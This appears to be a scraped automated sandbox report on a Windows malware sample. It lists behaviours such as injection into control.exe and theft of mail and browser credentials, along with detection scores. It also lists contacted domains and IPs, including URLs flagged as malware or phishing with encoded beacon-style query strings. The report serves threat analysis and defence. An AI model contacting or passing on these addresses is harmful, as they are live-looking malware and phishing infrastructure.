15->24 injected 28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        process9 dnsIp10 52 properscooter.com 198.54.116.236, 49785, 49786, 49787 NAMECHEAP-NETUS United States 24->52 54 www.dems-clicks.com 5.183.8.183, 49768, 80 INTERXSCH Germany 24->54 56 7 other IPs or domains 24->56 76 System process connects to network (likely due to code injection or exploit) 24->76 78 Performs DNS queries to domains with low reputation 24->78 32 control.exe 12 24->32         started        signatures11 process12 signatures13 58 Tries to steal Mail credentials (via file / registry access) 32->58 60 Tries to harvest and steal browser information (history, passwords, etc) 32->60 62 Modifies the context of a thread in another process (thread injection) 32->62 64 2 other signatures 32->64 35 cmd.exe 2 32->35         started        process14 signatures15 74 Tries to harvest and steal browser information (history, passwords, etc) 35->74 38 conhost.exe 35->38         started        process16

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          iuvRyl9i7D.exe24%VirustotalBrowse
          iuvRyl9i7D.exe20%ReversingLabs
          iuvRyl9i7D.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe20%ReversingLabs
          SourceDetectionScannerLabelLinkDownload
          12.0.iuvRyl9i7D.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          12.0.iuvRyl9i7D.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          12.0.iuvRyl9i7D.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          12.2.iuvRyl9i7D.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          SourceDetectionScannerLabelLink
          www.bldh45.xyz1%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://kace.uspplongee.com/0%Avira URL Cloudsafe
          http://www.fontbureau.comueo0%Avira URL Cloudsafe
          http://ansu.uspplongee.com/0%Avira URL Cloudsafe
          http://sangdu.uspplongee.com/0%Avira URL Cloudsafe
          http://meilong.uspplongee.com/0%Avira URL Cloudsafe
          http://www.uspplongee.com0%Avira URL Cloudsafe
          http://tanshuan.uspplongee.com/0%Avira URL Cloudsafe
          http://tuikun.uspplongee.com/0%Avira URL Cloudsafe
          https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=40%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://epa.uspplongee.com/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/:0%URL Reputationsafe
          http://sanque.uspplongee.com/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/20%URL Reputationsafe
          http://penjian.uspplongee.com/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/ana0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.fontbureau.comgrito0%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
          http://genzi.uspplongee.com/0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.uspplongee.com/n6g4/100%Avira URL Cloudmalware
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/U0%URL Reputationsafe
          http://gonglang.uspplongee.com/0%Avira URL Cloudsafe
          http://www.properscooter.com/n6g4/100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/staff/dennis.html0%Avira URL Cloudsafe
          http://qunben.uspplongee.com/0%Avira URL Cloudsafe
          http://www.fontbureau.comlic0%URL Reputationsafe
          http://www.bldh45.xyz/n6g4/0%Avira URL Cloudsafe
          http://www.fontbureau.comI.TTF:0%Avira URL Cloudsafe
          http://www.kickball.site/n6g4/100%Avira URL Cloudphishing
          http://www.carterandcone.coml0%URL Reputationsafe
          http://randu.uspplongee.com/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/y0%URL Reputationsafe
          http://www.founder.com.cn/cn.0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0(0%Avira URL Cloudsafe
          http://www.kickball.site/n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu100%Avira URL Cloudphishing
          http://en.wi50%Avira URL Cloudsafe
          http://shangeng.uspplongee.com/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/r0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/o0%URL Reputationsafe
          http://www.jamesreadtanusa.com/n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/n0%URL Reputationsafe
          http://www.founder.com.cn/cn50%URL Reputationsafe
          http://weimen.uspplongee.com/0%Avira URL Cloudsafe
          http://mianta.uspplongee.com/0%Avira URL Cloudsafe
          http://www.fontbureau.comFU0%Avira URL Cloudsafe
          http://www.fontbureau.comsivao0%Avira URL Cloudsafe
          http://www.carterandcone.comn-u0%URL Reputationsafe
          http://www.dems-clicks.com/n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV100%Avira URL Cloudmalware
          http://rechan.uspplongee.com/0%Avira URL Cloudsafe
          http://wudie.uspplongee.com/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://saoshui.uspplongee.com/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.zhongyicts.com.cn)0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          a6.pingcache.com
          38.34.163.59
          truetrue
            unknown
            www.bldh45.xyz
            35.241.47.216
            truefalseunknown
            www.dems-clicks.com
            5.183.8.183
            truetrue
              unknown
              www.jamesreadtanusa.com
              35.209.127.155
              truetrue
                unknown
                parkingpage.namecheap.com
                198.54.117.216
                truefalse
                  high
                  vip.myshopline.shop
                  104.17.232.29
                  truefalse
                    unknown
                    properscooter.com
                    198.54.116.236
                    truetrue
                      unknown
                      www.zeavd.com
                      unknown
                      unknowntrue
                        unknown
                        www.properscooter.com
                        unknown
                        unknowntrue
                          unknown
                          www.kickball.site
                          unknown
                          unknowntrue
                            unknown
                            www.uspplongee.com
                            unknown
                            unknowntrue
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://www.uspplongee.com/n6g4/true
                              • Avira URL Cloud: malware
                              unknown
                              http://www.properscooter.com/n6g4/true
                              • Avira URL Cloud: malware
                              unknown
                              http://www.bldh45.xyz/n6g4/false
                              • Avira URL Cloud: safe
                              unknown
                              http://www.kickball.site/n6g4/true
                              • Avira URL Cloud: phishing
                              unknown
                              http://www.kickball.site/n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHutrue
                              • Avira URL Cloud: phishing
                              unknown
                              http://www.jamesreadtanusa.com/n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXitrue
                              • Avira URL Cloud: safe
                              unknown
                              http://www.dems-clicks.com/n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznVtrue
                              • Avira URL Cloud: malware
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://kace.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.comueoiuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251866854.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251839011.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251710288.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251678493.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://ansu.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gcontrol.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://sangdu.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQcontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://meilong.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designersiuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.uspplongee.comcontrol.exe, 00000015.00000002.511522267.00000000052EB000.00000004.10000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://tanshuan.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.msn.com/ocid=iehpcontrol.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://tuikun.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        low
                                        http://www.sajatypeworks.comiuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://epa.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.founder.com.cn/cn/cTheiuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.jiyu-kobo.co.jp/:iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.gocontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowscontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://sanque.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/2iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://penjian.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/anaiuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com:iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250566915.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250528449.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250632388.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250598952.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250706232.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.galapagosdesign.com/DPleaseiuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.comgritoiuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256684499.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.ascendercorp.com/typedesigners.htmliuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/(iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://genzi.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.urwpp.deDPleaseiuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cniuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameiuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fontbureau.com.TTFiuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.msn.com/de-ch/?ocid=iehp4control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://consent.google.com/setpc=s&uxe=4421591control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.galapagosdesign.com/iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/UiuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://gonglang.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.google.com/?gws_rd=sslcontrol.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.com/?gws_rd=sslLMEMhcontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/frere-user.htmlZiuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.galapagosdesign.com/staff/dennis.htmliuvRyl9i7D.exe, 00000000.00000003.253906964.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253976291.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253867962.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254019876.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254002805.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253846416.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254048216.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://qunben.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
